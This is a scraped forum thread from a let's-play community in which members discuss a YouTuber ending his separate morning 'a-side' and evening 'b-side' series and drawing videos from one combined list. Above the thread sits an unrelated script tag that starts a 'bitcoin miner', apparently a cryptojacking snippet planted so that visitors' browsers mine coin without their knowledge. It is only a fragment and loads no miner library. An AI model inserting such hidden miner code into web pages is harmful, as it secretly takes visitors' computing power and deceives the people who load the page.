<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralsmbx community

the end of a-side

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Awoo
Wolf girls? In *my* area? It's more likely than you think!
Pronouns: he/him/his

Re: the end of a-side, the start of another

Postby Awoo » 2 months ago

Classtoise wrote:
raocow wrote: what no

What I mean is that, if there were still two distinct list, if one games go long it clogs up one list but the other list continues fine. By having one single row that splits, if one game goes long the 'head' can still let things through normally
So if I'm understanding right, "Oh, VIP 6 is out, but I'm still playing Donkey Kong 64", we'd theoretically get evening VIP 6 instead of "this happens ONLY in the morning when this game is done"?

I am probably WAY over complicating a simple concept but when don't I haha
raocow's jump will jump when it wants to jump, not necessarily when he wants it to
ワンワン :pal:

Ditocoaf
Haustone Tournament Finalist
Pronouns: he/him/his

Re: the end of a-side

Postby Ditocoaf » 2 months ago

Classtoise wrote:
raocow wrote: what no

What I mean is that, if there were still two distinct list, if one games go long it clogs up one list but the other list continues fine. By having one single row that splits, if one game goes long the 'head' can still let things through normally
So if I'm understanding right, "Oh, VIP 6 is out, but I'm still playing Donkey Kong 64", we'd theoretically get evening VIP 6 instead of "this happens ONLY in the morning when this game is done"?

I am probably WAY over complicating a simple concept but when don't I haha
Yeah, I think the idea is, whichever game (morning or evening) ends first, he'd put the next game he wants to play in that slot. One Big List*, which things like VIP 6 can still jump to the front of.

I mean, there's a chance he'd swap a game-in-progress from the morning slot to the evening slot, because it'd feel weird to publish Mario in the evening? But the fact that he's doing this "end of a-side" thing says to me that he's over that.

*I'm guessing he might make an exception when the game at the front of The List is too similar to the one game he's playing, but the other slot gets an opening first. In that case I imagine there's a chance he'd wait, to preserve some variety. But the a-side b-side paradigm is obsolete because there are currently more types of games that he plays than there are sides, so arbitrarily dividing them into two categories is silly.

ano0maly
Discord User

Postby ano0maly » 2 months ago

I would like to mention that the Mario side used to come in the evening for some time until some point during MAGLX2, when the contest was switched over to morning
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 2 months ago

I remember waking up to early morning Marios in high school so I dunno when this weird evening period occurred or why I don't remember it but sure
i've honestly never played a video game in my life

SAJewers
hi

Postby SAJewers » 2 months ago

IIRC it was around when he started his patreon and went back to 2 videos a day. The Mario was in the evening and the other game was in the morning.

His EVO break one year happened to occur during MaGLX 2, so he went down to doing just MaGLX 2 that week in the morning, and it's been mario in the morning ever since.
ImageImageImageImageImage
ImageImageImageImage

Super Llama
Love is stored in the robot

Postby Super Llama » 2 months ago

I mean, it doesn't sound like the a-side and b-sides are actually going to end, just that they're going to be drawn from a combined list from now on if I understand correctly.

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 1 month ago

Got ultra clickbaited by this title not gonna lie

SAJewers
hi

Postby SAJewers » 1 month ago

rip side, whichever side that is
ImageImageImageImageImage
ImageImageImageImage

KayhemMaus
I keep breaking my face on SMBX
First name: KM
Pronouns: they/them/their

Postby KayhemMaus » 1 month ago

Wait, sides actually meant something? I just thought it was a denotation of morning/evening (and afternoon when the C sides came in) uploads. I guess I don't pay attention to anything! XD

Also wow, DK64... what a run that's going to be.
nyoro~n n~yoron

I love it

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

BOB is an acronym for BOB is Only BOB etc.

Return to “let's play”